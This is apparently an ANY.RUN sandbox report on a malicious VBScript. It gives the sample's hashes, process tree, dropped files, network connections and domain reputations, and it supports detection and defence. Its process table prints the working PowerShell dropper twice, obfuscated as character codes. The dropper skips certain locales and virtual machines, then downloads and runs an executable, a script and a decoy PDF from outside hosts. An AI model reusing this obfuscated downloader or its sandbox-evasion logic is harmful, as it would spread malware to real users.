File name: | IT299491460719147094788931329368.vbs |
Full analysis: | https://app.any.run/tasks/2446a0d7-5518-43c9-acff-b76e2f532951 |
Verdict: | Malicious activity |
Analysis date: | April 15, 2019, 10:18:44 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with CRLF, LF line terminators |
MD5: | BE2037637040347BBC876417A1A76BE5 |
SHA1: | 2D0825923FD21D650173C3E36C3D3800C2905E56 |
SHA256: | E54AA8C3D986C37FF2F22CA546A5A6552B3FCFF5D563B685EF2934846B6DA49F |
SSDEEP: | 384:ISWGhznuudJj/Hy1RSP0q8Gr4uF20zsRcJrII+Wwa1pgvZGN/9CE:3ZPT |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2680 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\IT299491460719147094788931329368.vbs" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
1092 | powershell -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,106,115,105,118,98,106,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,98,97,116,122,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,106,122,120,117,97,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,119,103,101,105,39,59,36,120,105,98,104,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,120,122,121,97,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,121,106,115,117,117,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,99,118,101,100,117,46,112,100,102,39,59,36,102,103,100,116,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,102,103,100,116,44,36,120,105,98,104,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,105,98,104,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,106,122,120,117,97,44,36,98,97,116,122,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,98,97,116,122,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,120,122,121,97,44,36,121,106,115,117,117,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,121,106,115,117,117,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2660 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -Command $a='';105,102,40,32,40,40,71,101,116,45,85,73,67,117,108,116,117,114,101,41,46,78,97,109,101,32,45,109,97,116,99,104,32,39,82,85,124,85,65,124,66,89,124,67,78,39,41,32,45,111,114,32,40,40,71,101,116,45,87,109,105,79,98,106,101,99,116,32,45,99,108,97,115,115,32,87,105,110,51,50,95,67,111,109,112,117,116,101,114,83,121,115,116,101,109,32,45,80,114,111,112,101,114,116,121,32,77,111,100,101,108,41,46,77,111,100,101,108,32,45,109,97,116,99,104,32,39,86,105,114,116,117,97,108,66,111,120,124,86,77,119,97,114,101,124,75,86,77,39,41,32,41,123,32,101,120,105,116,59,32,125,59,36,106,115,105,118,98,106,32,61,32,91,83,121,115,116,101,109,46,73,79,46,80,97,116,104,93,58,58,71,101,116,84,101,109,112,80,97,116,104,40,41,59,36,98,97,116,122,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,74,117,99,104,101,99,107,120,54,52,46,101,120,101,39,59,36,106,122,120,117,97,32,61,32,39,104,116,116,112,58,47,47,105,116,46,101,109,101,114,97,108,100,115,117,114,102,115,99,105,101,110,99,101,115,46,105,110,102,111,47,97,112,105,63,119,103,101,105,39,59,36,120,105,98,104,105,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,83,101,97,114,99,104,73,51,50,46,106,115,39,59,36,120,122,121,97,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,36,121,106,115,117,117,32,61,32,74,111,105,110,45,80,97,116,104,32,36,106,115,105,118,98,106,32,39,99,118,101,100,117,46,112,100,102,39,59,36,102,103,100,116,32,61,32,39,104,116,116,112,58,47,47,105,109,103,46,101,115,115,45,105,100,46,99,111,109,47,108,50,46,112,104,112,63,118,105,100,61,112,101,99,55,39,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,102,103,100,116,44,36,120,105,98,104,105,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,120,105,98,104,105,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,106,122,120,117,97,44,36,98,97,116,122,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,98,97,116,122,59,125,99,97,116,99,104,123,125,59,116,114,121,123,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,46,68,111,119,110,108,111,97,100,70,105,108,101,40,36,120,122,121,97,44,36,121,106,115,117,117,41,59,83,116,97,114,116,45,80,114,111,99,101,115,115,32,36,121,106,115,117,117,59,125,99,97,116,99,104,123,125,59|%{$a+=[char]$_};iex $a; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WScript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2808 | "C:\Windows\system32\ntvdm.exe" -i1 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Exit code: 3221225477 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1652 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | powershell.exe | |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
3440 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" --type=renderer "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe Acrobat Reader DC Version: 15.23.20070.215641 | ||||
2240 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16448250 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | AcroRd32.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2860 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --disable-direct-write --lang=en-US --lang=en-US --log-severity=disable --product-version="ReaderServices/15.23.20053 Chrome/45.0.2454.85" --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel="2240.0.1635227101\2069600459" --allow-no-sandbox-job /prefetch:673131151 | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe | — | RdrCEF.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: LOW Description: Adobe RdrCEF Version: 15.23.20053.211670 | ||||
2148 | "C:\Windows\system32\ntvdm.exe" -i2 | C:\Windows\system32\ntvdm.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: NTVDM.EXE Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1360 | "C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\admin\AppData\Local\Temp\cvedu.pdf" | C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | — | powershell.exe |
User: admin Company: Adobe Systems Incorporated Integrity Level: MEDIUM Description: Adobe Acrobat Reader DC Exit code: 1 Version: 15.23.20070.215641 |
PID | Process | Filename | Type | |
---|---|---|---|---|
1092 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5LI3S550LO0SQS9217J0.temp | — | |
MD5:— | SHA256:— | |||
2660 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6SE7WLE88IJALD1DUJNN.temp | — | |
MD5:— | SHA256:— | |||
2808 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs691C.tmp | — | |
MD5:— | SHA256:— | |||
2808 | ntvdm.exe | C:\Users\admin\AppData\Local\Temp\scs691D.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3440 | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3440 | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R189rto1_1o4tw27_2nk.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9R48gdg9_1o4tw28_2nk.tmp | — | |
MD5:— | SHA256:— | |||
3440 | AcroRd32.exe | C:\Users\admin\AppData\Local\Temp\acrord32_sbx\A9Rktc6lg_1o4tw29_2nk.tmp | — | |
MD5:— | SHA256:— |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/279_15_23_20070.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/message.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/281_15_23_20070.zip | unknown | — | — | whitelisted |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/280_15_23_20070.zip | unknown | — | — | whitelisted |
2660 | powershell.exe | GET | 200 | 185.158.249.151:80 | http://it.emeraldsurfsciences.info/api?wgei | NL | text | 4 b | suspicious |
1652 | AcroRd32.exe | GET | 304 | 2.16.186.33:80 | http://acroipm2.adobe.com/15/rdr/ENU/win/nooem/none/consumer/277_15_23_20070.zip | unknown | — | — | whitelisted |
1092 | powershell.exe | GET | 200 | 185.158.249.151:80 | http://it.emeraldsurfsciences.info/api?wgei | NL | text | 4 b | suspicious |
2660 | powershell.exe | GET | 200 | 185.158.251.243:80 | http://img.ess-id.com/l2.php?vid=pec7 | NL | text | 18.0 Kb | malicious |
1092 | powershell.exe | GET | 200 | 185.158.251.243:80 | http://img.ess-id.com/l2.php?vid=pec7 | NL | text | 17.3 Kb | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1092 | powershell.exe | 185.158.251.243:80 | img.ess-id.com | 23media GmbH | NL | suspicious |
2660 | powershell.exe | 185.158.249.151:80 | it.emeraldsurfsciences.info | easystores GmbH | NL | suspicious |
1652 | AcroRd32.exe | 2.16.186.33:80 | acroipm2.adobe.com | Akamai International B.V. | — | whitelisted |
2660 | powershell.exe | 185.158.251.243:80 | img.ess-id.com | 23media GmbH | NL | suspicious |
1092 | powershell.exe | 185.158.249.151:80 | it.emeraldsurfsciences.info | easystores GmbH | NL | suspicious |
1652 | AcroRd32.exe | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
— | — | 2.18.233.74:443 | armmf.adobe.com | Akamai International B.V. | — | whitelisted |
— | — | 23.58.217.61:443 | ardownload2.adobe.com | Akamai Technologies, Inc. | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
img.ess-id.com |
| malicious |
it.emeraldsurfsciences.info |
| suspicious |
armmf.adobe.com |
| whitelisted |
acroipm2.adobe.com |
| whitelisted |
ardownload2.adobe.com |
| whitelisted |